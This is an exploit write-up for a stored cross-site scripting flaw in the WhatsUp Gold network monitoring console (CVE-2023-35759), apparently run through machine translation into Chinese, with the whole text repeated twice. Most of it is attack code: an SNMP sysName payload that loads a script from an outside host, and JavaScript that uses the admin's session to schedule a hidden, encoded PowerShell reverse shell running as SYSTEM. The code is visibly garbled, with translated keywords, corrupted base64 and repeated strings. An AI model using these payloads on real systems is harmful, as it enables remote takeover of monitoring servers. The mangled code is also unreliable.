#Exploit Title: Whatsupgold 22.1.0-存储的跨站点脚本(XSS)
#date: 2023年4月18日
#利用作者: Andreas Finstad(4NDR34Z)
#供应商homepage: https://www.whatsupgold.com
#版本: v.22.1.0构建39
#在: Windows 2022服务器上测试
#CVE : CVE-2023-35759
#参考: https://nvd.nist.gov/vuln/detail/cve-2023-35759
Whatsup Gold 2022(22.1.0构建39)
存储在SYSNAME SNMP参数中。
漏洞报告:在Whatsup Gold 2022中存储XSS(22.1.0构建39)
产品名称: Whatsup Gold 2022
版本: 22.1.0构建39
漏洞Type:存储的跨站点脚本(XSS)
Description:
Whatsup Gold 2022容易受到存储的跨站点脚本(XSS)攻击,该攻击使攻击者可以将恶意脚本注入管理控制台。该漏洞存在于设备上的SYSNAME SNMP字段中,该漏洞在SNMP发现后反映了SNMP设备从SNMP设备进入管理员控制台的输入。
攻击者可以通过制作包含恶意代码的专门制作的SNMP设备名称来利用此漏洞。将设备名称保存并反映在管理员控制台中后,注射的代码将在管理用户的上下文中执行,有可能允许攻击者窃取敏感数据或执行未经授权的操作。
由于没有CSRF代币或CDP,因此创建一个JavaScript有效负载是微不足道的,该JavaScript有效负载在服务器上添加计划的操作,该操作将代码执行为“ NT System”。在我的POC代码中,我添加了一个PowerShell RevShell,该RevShell每5分钟连接一次攻击者。 (ScreenShot3)
单击“所有名称和地址”时XSS触发器
Stage:
BASE64编码ID属性:
var a=document.createelement('script'); a.src='https://f20.be/t.js'; document.body.body.appendchild(a);
在device:上放置在SNMP sysname字段中的上演有效载荷
IMG ID=dmfyige9zg9jdw1lbnquy3JlyxrlrrrrrrrwxlBwVudcgic2nyaxb0iik7ys5zcmm9imh0dhbzoii8vzjiwlmjll3quanmio2rvy3quanmiio2rvy3vtzwtzwtzwtzw50lmjvzhkhkhkhkwwquysk7cqquyysknknkw5bbquy y> src=https://f20.be/1 onload=est=est(atob(this.id))
PAYLOAD:
var vhost=window.location.protocol+'\/\/'+window.location.host
addAction();
异步函数addAction(){
var参数=''
ling run=fetch(vhost+'/nmconsole/api/core/wugpowershellscript?_dc=1655327281064',{
method:'post',
headers: {
'Connection':'关闭',
'content Length':'1902',
'sec-ch-ua':''不a; brand'; v='99','chromium'; v='102','microsoft edge'; v='102',
'Accept':'应用程序/JSON,
'content-type':'应用程序/json',
'x-重新quested-with':'xmlhttprequest',
'sec-ch-ua-mobile':'?0',
'用户代理:'Mozilla/5.0(Macintosh; Intel Mac OS X 10_15_7)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/102.02.0.5005.63 Safari/537.36 EDG/102.02.0.0.1245.36 EDG/537.36
'sec-ch-ua-platform':''macos'',
'sec-fetch mode':'cors',
'sec-fetch-dest':'空',
'接受编码:'gzip,deflate',
'Accept-Language':'nb,no; q=0.9,en; q=0.8,en-gb; q=0.7,en-us; q=0.6,sv; q=0.5,fr; q=0.4'
},
凭证:'包括',
Body:'{'id':-1,'timeout':30,'scriptText':'start -start -process -process powerShell -argumentList \\' - w隐藏-Noperofile -executile -executire -execution -execution -execution -bypass -noexit -noexit -eexit -eexit -eexit -noexit -e jab0ag0acaagad0aiabaacgajwbzafkauwb0aguatqauag4arqb0ac4ac4acwbpagmajwasaccascascascaswbfahqacwauahqauahqaqaqaqaqaqaqaqaqwbqaemabababjagua BGB0ACCAKQA7ACQADABTAHAAMGAGAD0AIABBAFMAFMADABYAGKABGBNF0AOGA6AEOABWBPAG4AKAANACCALAAKAAKAAKAKAKAKAHQABQBQBWACKAOWAKAKAGMAB abpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiaakahqabqabqbqbqbqbwadiakaanadeaoqayac4amqa2Adgalgalgaxadyalgazaduaj wasadqanaa0adqakqa7AcqAcwb0ahiazqbhag0aiaaaoaa9AcaaJabjagwaaqblag4AadaauauaeAcazqB0afmadabyAguayqBtacgakqa7afsayg B5AHQAZQBBAF0AXQAKAKAGIAEQB0AAGUACWAGAD0AIAAWAC4ALGA2ADUANQAZAZADUAFAALAHSAMAB9ADSADSADSADSADWBOAGKABABLABABLACGAKAAKAAKAAKAAKAAKAAKAAKAAKAAKAIAA 9ACAAJABZAHQACGBLAGEABQAUAFIAZQBHAGQAKAAKAAKAAKAGIAEQB0AGUACWASACAAMAAMASACAAAMASACAAJABIAHKADABLABLABABABALGMALGBMALGBMAGUABGBBNAHQAAAA packaiaatag4azqagadaakqb7adsajabkagageadabhacaapqagacgatgblahcalqbalqbpagiaagblagmadaagac0avab5ahaazqboagageabqbl acaauwb5ahmadablabag0algbuaguaeab0ac4aqqbtaemasqbjaeuabgbgbgbjag8azabpag4azwapac4arwblahqauwb0ahiaaaqbuagcakaaka GIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAc gbpag4azwagackaowawakahmazqbuagqaygbhagmaawayacaapqaapqagacqacqacwblag4azwagackaowawakawakahmazqbuagqaygbhagmaawapqaapqagacqagacqacqagacqacwblagblagblag4azabiageaywbrac aakwagacgajablag4adga6afuacwblahiatgbhag0azqapacaakwagaccaqaanacaakaakaakwagacgajablagjablag4adga6afuacwblahiarabva g0ayqbpag4akqagacsaiaaoafsauwb5ahmadablabag0algbfag4adgbpahiabwbuag0azqbuaxqbuaxqa6adoatgblahcatabpag4azqapacaa kwagacgazwblahqalqbsag8aywbhahqaqaaqbvag4akqaraccapganadsajabzaguabgbkagagbkagiaeqb0aguaiaaaaiaa9acaakaakaakakakakabbahqazqb4ahqa lgblag4aywbvagqaaqbuagcaxqa6adoaqqqbtaemasqbjackalgbhaguadabcahkadabcahkadablablabablabababaakaakaakaakaakaakaakakakakahmazqbuagqaygbhagmaawayawawayackaao wakahmadabyaguayqbtac4avwwbbyabkadablacgajabzaguabgbkagiaeqb0agualawacwaacwajabzaguabgbbkagagagiaeqbbkagiaeqb0agualgbmaguabg bnahqaaaapadsajabzahqacgblageabqauaeabab1ahmaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aacqaywbsagkazqbuahqalgbbuahqalgbdagbdagwabwbzaguakaapaapa==\\' -nonewwindow','ScriptImpersonateFlag':False,'ClsID':'5909A09A-CCE6-CCE6-11E0-8F66-FE544824019B'
});
setTimeout(()={getActions();},1000);
};
异步函数getActions(){
const响应=等待提取(vhost+'/nmconsole/api/core/wugations?_dc=4',{
method:'get',
headers: {
'Connection':'关闭',
'sec-ch-ua':''不a; brand'; v='99','chromium'; v='102','microsoft edge'; v='102',
'Accept':'应用程序/JSON,
'content-type':'应用程序/json',
'x-重新quested-with':'xmlhttprequest',
'sec-ch-ua-mobile':'?0',
'用户代理:'Mozilla/5.0(Macintosh; Intel Mac OS X 10_15_7)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/102.02.0.5005.63 Safari/537.36 EDG/102.02.0.0.1245.36 EDG/537.36
'sec-ch-ua-platform':''macos'',
'sec-fetch-site':'same-origin',
'sec-fetch mode':'cors',
'sec-fetch-dest':'空',
'接受编码:'gzip,deflate',
'Accept-Language':'nb,no; q=0.9,en; q=0.8,en-gb; q=0.7,en-us; q=0.6,sv; q=0.5,fr; q=0.4'
},
凭证:'包括'
});
const Action=等待响应。JSON();
var结果=[];
var SearchField='name';
var搜索='SystemTask';
for(var i=0; i action.length; i ++)
{
if(action [searchfield]==searchval){
results.push(action .id);
RevShell(结果[0])
}
}
//console.log();
};
异步函数RevShell(id){
fetch(vhost+'/nmconsole/configuration/dlGrecurringActionLibrary/dlgschedule/dlgschedule.asp',{
method:'post',
headers: {
'Connection':'关闭',
'content Length':'2442',
'cache-control':'max-age=0',
'sec-ch-ua':''不a; brand'; v='99','chromium'; v='102','microsoft edge'; v='102',
'sec-ch-ua-mobile':'?0',
'sec-ch-ua-platform':''macos'',
'升级- 不肯定- 重新要求':'1',
'Origin':'https://192.168.16.100',
'content-type':'应用程序/x-www-form-urlencoded',
'用户代理:'Mozilla/5.0(Macintosh; Intel Mac OS X 10_15_7)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/102.02.0.5005.63 Safari/537.36 EDG/102.02.0.0.1245.36 EDG/537.36
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8,application/application/nigned-exchange; v=b3; q=0.9',
'sec-fetch-site':'same-origin',
'sec-fetch mode':'导航',
'sec-fetch-user':'?1',
'sec-fetch-dest':'iframe',
'参考器:'https://192.168.16.100/nmconsole/co...ngactionLibrary/dlgschedule/dlgschedule.asp',
'接受编码:'gzip,deflate',
'Accept-Language':'nb,no; q=0.9,en; q=0.8,en-gb; q=0.7,en-us; q=0.6,sv; q=0.5,fr; q=0.4'
},
凭证:'包括',
Body: 'dlgschedule.ocheckboxenableschedule=ondlgschedule.scheduletype=dlgschedule.oradiobuttoninttonintervaldlgschedule.oeditIntervalminutes=5showaspformdialog.vis itedform=visiteddlGrecurringActionGeneral.oeditName=testDlGrecurringCenerAtionGenerar.ocomboSelectactionType=21dlGrecurringCenerAtionGeneral.DialogroTerturnurl=%2F NMCONSOLE%2F%24NM%2FCORE%2FForm-spforms%2FINC%2fShowAspformDialog.aspDlgreCurringActionGeneral.SavedFormState=%253CSAVEDFORMSTATE%253E%253E%253E%253cformvariabl es%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQue RyStringVariobles%2F%253E%253C%2FSAVEDFORNSTATE%253edlgrecurringActionGeneral.VisitedForm=访问%访问%2C+visiteddlgschedule.dialogreturnurl=%2fnmconsole%2F %24NM%2fcore%2fform-spforms%2FINC%2fshowaspformdialog.aspdlgschedule.savedformstate=%253CSAVEDFORMSTATE%253E%253E%253CformVariables%253E%253E%253E%253划定2520sn AME%3D%2522__VIEWSTATE%2522%2520SVALUE%3D%2522%2522%25253CViewState%2F%25253E%0D%0A%2522%2F%2F%253E%253C%253C%2fformvariobles%2fformvariables%253CQueryStringvariablestringvariablesblesblesblesblesblesblesbles; 253C%2FSAVEDFORMSTATE%253E__EVENTTYPE=buttonpressed__eventTarget=dlgschedule.obuttonfinish__eventargument=dlgschedule.visitedform.visitedform=visited _________________________________________________________________________________ERCEForm=visited=sourceform=dl gSchedule__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStart Week%2522%2520svalue%3D%25220%2522%2F%253E%253E%253 coelement%2520SNAME%%3D%2522DATEDATE_SMEDIMDATEFORMAT%2522%2522%2520SVALUE%3D%3D%2522MMM%2522mmm; F%253E%253COELEMENT%2520SNAME%3D%2522dlgschedule.swebusername%2522%2522%2520SVALUE%3D%25222ADMIN%2522%2F%2F%2F%253E%253E%253COELEMEND%253 Coelement%2520sName%3D%252222DLGRECERRICTATION常规。swebusername%2522%2520SVALUE%3D%2522ADMIN%2522%2F%253E%253Coelement%2520sname%%3D%2522DLGSCHEDULE.RECURRINGATICACTIONS-SMODESMODESMODESMODE%2522%2522%2520SVALUE%3D%3D%25222n ef%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24Hou RTIME%2522%2520SVALUE%3D%25220%2522%2F%253E%253C%2FViewState%253E%253E%0D%0D%0ADLGSCHEDULE.OEDITDAY=DLGSCHEDULE.OCOMBOMBOSELECTM onthminute=0dlgschedule.ocomboboBoselectMonThampm=0dlgschedule.ocomboslectWeekHour=0dlgschedule.ocombomboslectweekminute=0dlgschedule.ocombombombombombombombombomboselectweekekampm=0''''''''''''''''''''''''''''''''''''''''''''
});
};
#date: 2023年4月18日
#利用作者: Andreas Finstad(4NDR34Z)
#供应商homepage: https://www.whatsupgold.com
#版本: v.22.1.0构建39
#在: Windows 2022服务器上测试
#CVE : CVE-2023-35759
#参考: https://nvd.nist.gov/vuln/detail/cve-2023-35759
Whatsup Gold 2022(22.1.0构建39)
存储在SYSNAME SNMP参数中。
漏洞报告:在Whatsup Gold 2022中存储XSS(22.1.0构建39)
产品名称: Whatsup Gold 2022
版本: 22.1.0构建39
漏洞Type:存储的跨站点脚本(XSS)
Description:
Whatsup Gold 2022容易受到存储的跨站点脚本(XSS)攻击,该攻击使攻击者可以将恶意脚本注入管理控制台。该漏洞存在于设备上的SYSNAME SNMP字段中,该漏洞在SNMP发现后反映了SNMP设备从SNMP设备进入管理员控制台的输入。
攻击者可以通过制作包含恶意代码的专门制作的SNMP设备名称来利用此漏洞。将设备名称保存并反映在管理员控制台中后,注射的代码将在管理用户的上下文中执行,有可能允许攻击者窃取敏感数据或执行未经授权的操作。
由于没有CSRF代币或CDP,因此创建一个JavaScript有效负载是微不足道的,该JavaScript有效负载在服务器上添加计划的操作,该操作将代码执行为“ NT System”。在我的POC代码中,我添加了一个PowerShell RevShell,该RevShell每5分钟连接一次攻击者。 (ScreenShot3)
单击“所有名称和地址”时XSS触发器
Stage:
BASE64编码ID属性:
var a=document.createelement('script'); a.src='https://f20.be/t.js'; document.body.body.appendchild(a);
在device:上放置在SNMP sysname字段中的上演有效载荷
IMG ID=dmfyige9zg9jdw1lbnquy3JlyxrlrrrrrrrwxlBwVudcgic2nyaxb0iik7ys5zcmm9imh0dhbzoii8vzjiwlmjll3quanmio2rvy3quanmiio2rvy3vtzwtzwtzwtzw50lmjvzhkhkhkhkwwquysk7cqquyysknknkw5bbquy y> src=https://f20.be/1 onload=est=est(atob(this.id))
PAYLOAD:
var vhost=window.location.protocol+'\/\/'+window.location.host
addAction();
异步函数addAction(){
var参数=''
ling run=fetch(vhost+'/nmconsole/api/core/wugpowershellscript?_dc=1655327281064',{
method:'post',
headers: {
'Connection':'关闭',
'content Length':'1902',
'sec-ch-ua':''不a; brand'; v='99','chromium'; v='102','microsoft edge'; v='102',
'Accept':'应用程序/JSON,
'content-type':'应用程序/json',
'x-重新quested-with':'xmlhttprequest',
'sec-ch-ua-mobile':'?0',
'用户代理:'Mozilla/5.0(Macintosh; Intel Mac OS X 10_15_7)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/102.02.0.5005.63 Safari/537.36 EDG/102.02.0.0.1245.36 EDG/537.36
'sec-ch-ua-platform':''macos'',
'sec-fetch mode':'cors',
'sec-fetch-dest':'空',
'接受编码:'gzip,deflate',
'Accept-Language':'nb,no; q=0.9,en; q=0.8,en-gb; q=0.7,en-us; q=0.6,sv; q=0.5,fr; q=0.4'
},
凭证:'包括',
Body:'{'id':-1,'timeout':30,'scriptText':'start -start -process -process powerShell -argumentList \\' - w隐藏-Noperofile -executile -executire -execution -execution -execution -bypass -noexit -noexit -eexit -eexit -eexit -noexit -e jab0ag0acaagad0aiabaacgajwbzafkauwb0aguatqauag4arqb0ac4ac4acwbpagmajwasaccascascascaswbfahqacwauahqauahqaqaqaqaqaqaqaqaqwbqaemabababjagua BGB0ACCAKQA7ACQADABTAHAAMGAGAD0AIABBAFMAFMADABYAGKABGBNF0AOGA6AEOABWBPAG4AKAANACCALAAKAAKAAKAKAKAKAHQABQBQBWACKAOWAKAKAGMAB abpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiaakahqabqabqbqbqbqbwadiakaanadeaoqayac4amqa2Adgalgalgaxadyalgazaduaj wasadqanaa0adqakqa7AcqAcwb0ahiazqbhag0aiaaaoaa9AcaaJabjagwaaqblag4AadaauauaeAcazqB0afmadabyAguayqBtacgakqa7afsayg B5AHQAZQBBAF0AXQAKAKAGIAEQB0AAGUACWAGAD0AIAAWAC4ALGA2ADUANQAZAZADUAFAALAHSAMAB9ADSADSADSADSADWBOAGKABABLABABLACGAKAAKAAKAAKAAKAAKAAKAAKAAKAAKAIAA 9ACAAJABZAHQACGBLAGEABQAUAFIAZQBHAGQAKAAKAAKAAKAGIAEQB0AGUACWASACAAMAAMASACAAAMASACAAJABIAHKADABLABLABABABALGMALGBMALGBMAGUABGBBNAHQAAAA packaiaatag4azqagadaakqb7adsajabkagageadabhacaapqagacgatgblahcalqbalqbpagiaagblagmadaagac0avab5ahaazqboagageabqbl acaauwb5ahmadablabag0algbuaguaeab0ac4aqqbtaemasqbjaeuabgbgbgbjag8azabpag4azwapac4arwblahqauwb0ahiaaaqbuagcakaaka GIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAc gbpag4azwagackaowawakahmazqbuagqaygbhagmaawayacaapqaapqagacqacqacwblag4azwagackaowawakawakahmazqbuagqaygbhagmaawapqaapqagacqagacqacqagacqacwblagblagblag4azabiageaywbrac aakwagacgajablag4adga6afuacwblahiatgbhag0azqapacaakwagaccaqaanacaakaakaakwagacgajablagjablag4adga6afuacwblahiarabva g0ayqbpag4akqagacsaiaaoafsauwb5ahmadablabag0algbfag4adgbpahiabwbuag0azqbuaxqbuaxqa6adoatgblahcatabpag4azqapacaa kwagacgazwblahqalqbsag8aywbhahqaqaaqbvag4akqaraccapganadsajabzaguabgbkagagbkagiaeqb0aguaiaaaaiaa9acaakaakaakakakakabbahqazqb4ahqa lgblag4aywbvagqaaqbuagcaxqa6adoaqqqbtaemasqbjackalgbhaguadabcahkadabcahkadablablabablabababaakaakaakaakaakaakaakakakakahmazqbuagqaygbhagmaawayawawayackaao wakahmadabyaguayqbtac4avwwbbyabkadablacgajabzaguabgbkagiaeqb0agualawacwaacwajabzaguabgbbkagagagiaeqbbkagiaeqb0agualgbmaguabg bnahqaaaapadsajabzahqacgblageabqauaeabab1ahmaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aacqaywbsagkazqbuahqalgbbuahqalgbdagbdagwabwbzaguakaapaapa==\\' -nonewwindow','ScriptImpersonateFlag':False,'ClsID':'5909A09A-CCE6-CCE6-11E0-8F66-FE544824019B'
});
setTimeout(()={getActions();},1000);
};
异步函数getActions(){
const响应=等待提取(vhost+'/nmconsole/api/core/wugations?_dc=4',{
method:'get',
headers: {
'Connection':'关闭',
'sec-ch-ua':''不a; brand'; v='99','chromium'; v='102','microsoft edge'; v='102',
'Accept':'应用程序/JSON,
'content-type':'应用程序/json',
'x-重新quested-with':'xmlhttprequest',
'sec-ch-ua-mobile':'?0',
'用户代理:'Mozilla/5.0(Macintosh; Intel Mac OS X 10_15_7)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/102.02.0.5005.63 Safari/537.36 EDG/102.02.0.0.1245.36 EDG/537.36
'sec-ch-ua-platform':''macos'',
'sec-fetch-site':'same-origin',
'sec-fetch mode':'cors',
'sec-fetch-dest':'空',
'接受编码:'gzip,deflate',
'Accept-Language':'nb,no; q=0.9,en; q=0.8,en-gb; q=0.7,en-us; q=0.6,sv; q=0.5,fr; q=0.4'
},
凭证:'包括'
});
const Action=等待响应。JSON();
var结果=[];
var SearchField='name';
var搜索='SystemTask';
for(var i=0; i action.length; i ++)
{
if(action [searchfield]==searchval){
results.push(action .id);
RevShell(结果[0])
}
}
//console.log();
};
异步函数RevShell(id){
fetch(vhost+'/nmconsole/configuration/dlGrecurringActionLibrary/dlgschedule/dlgschedule.asp',{
method:'post',
headers: {
'Connection':'关闭',
'content Length':'2442',
'cache-control':'max-age=0',
'sec-ch-ua':''不a; brand'; v='99','chromium'; v='102','microsoft edge'; v='102',
'sec-ch-ua-mobile':'?0',
'sec-ch-ua-platform':''macos'',
'升级- 不肯定- 重新要求':'1',
'Origin':'https://192.168.16.100',
'content-type':'应用程序/x-www-form-urlencoded',
'用户代理:'Mozilla/5.0(Macintosh; Intel Mac OS X 10_15_7)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/102.02.0.5005.63 Safari/537.36 EDG/102.02.0.0.1245.36 EDG/537.36
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8,application/application/nigned-exchange; v=b3; q=0.9',
'sec-fetch-site':'same-origin',
'sec-fetch mode':'导航',
'sec-fetch-user':'?1',
'sec-fetch-dest':'iframe',
'参考器:'https://192.168.16.100/nmconsole/co...ngactionLibrary/dlgschedule/dlgschedule.asp',
'接受编码:'gzip,deflate',
'Accept-Language':'nb,no; q=0.9,en; q=0.8,en-gb; q=0.7,en-us; q=0.6,sv; q=0.5,fr; q=0.4'
},
凭证:'包括',
Body: 'dlgschedule.ocheckboxenableschedule=ondlgschedule.scheduletype=dlgschedule.oradiobuttoninttonintervaldlgschedule.oeditIntervalminutes=5showaspformdialog.vis itedform=visiteddlGrecurringActionGeneral.oeditName=testDlGrecurringCenerAtionGenerar.ocomboSelectactionType=21dlGrecurringCenerAtionGeneral.DialogroTerturnurl=%2F NMCONSOLE%2F%24NM%2FCORE%2FForm-spforms%2FINC%2fShowAspformDialog.aspDlgreCurringActionGeneral.SavedFormState=%253CSAVEDFORMSTATE%253E%253E%253E%253cformvariabl es%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQue RyStringVariobles%2F%253E%253C%2FSAVEDFORNSTATE%253edlgrecurringActionGeneral.VisitedForm=访问%访问%2C+visiteddlgschedule.dialogreturnurl=%2fnmconsole%2F %24NM%2fcore%2fform-spforms%2FINC%2fshowaspformdialog.aspdlgschedule.savedformstate=%253CSAVEDFORMSTATE%253E%253E%253CformVariables%253E%253E%253E%253划定2520sn AME%3D%2522__VIEWSTATE%2522%2520SVALUE%3D%2522%2522%25253CViewState%2F%25253E%0D%0A%2522%2F%2F%253E%253C%253C%2fformvariobles%2fformvariables%253CQueryStringvariablestringvariablesblesblesblesblesblesblesbles; 253C%2FSAVEDFORMSTATE%253E__EVENTTYPE=buttonpressed__eventTarget=dlgschedule.obuttonfinish__eventargument=dlgschedule.visitedform.visitedform=visited _________________________________________________________________________________ERCEForm=visited=sourceform=dl gSchedule__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStart Week%2522%2520svalue%3D%25220%2522%2F%253E%253E%253 coelement%2520SNAME%%3D%2522DATEDATE_SMEDIMDATEFORMAT%2522%2522%2520SVALUE%3D%3D%2522MMM%2522mmm; F%253E%253COELEMENT%2520SNAME%3D%2522dlgschedule.swebusername%2522%2522%2520SVALUE%3D%25222ADMIN%2522%2F%2F%2F%253E%253E%253COELEMEND%253 Coelement%2520sName%3D%252222DLGRECERRICTATION常规。swebusername%2522%2520SVALUE%3D%2522ADMIN%2522%2F%253E%253Coelement%2520sname%%3D%2522DLGSCHEDULE.RECURRINGATICACTIONS-SMODESMODESMODESMODE%2522%2522%2520SVALUE%3D%3D%25222n ef%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24Hou RTIME%2522%2520SVALUE%3D%25220%2522%2F%253E%253C%2FViewState%253E%253E%0D%0D%0ADLGSCHEDULE.OEDITDAY=DLGSCHEDULE.OCOMBOMBOSELECTM onthminute=0dlgschedule.ocomboboBoselectMonThampm=0dlgschedule.ocomboslectWeekHour=0dlgschedule.ocombomboslectweekminute=0dlgschedule.ocombombombombombombombombomboselectweekekampm=0''''''''''''''''''''''''''''''''''''''''''''
});
};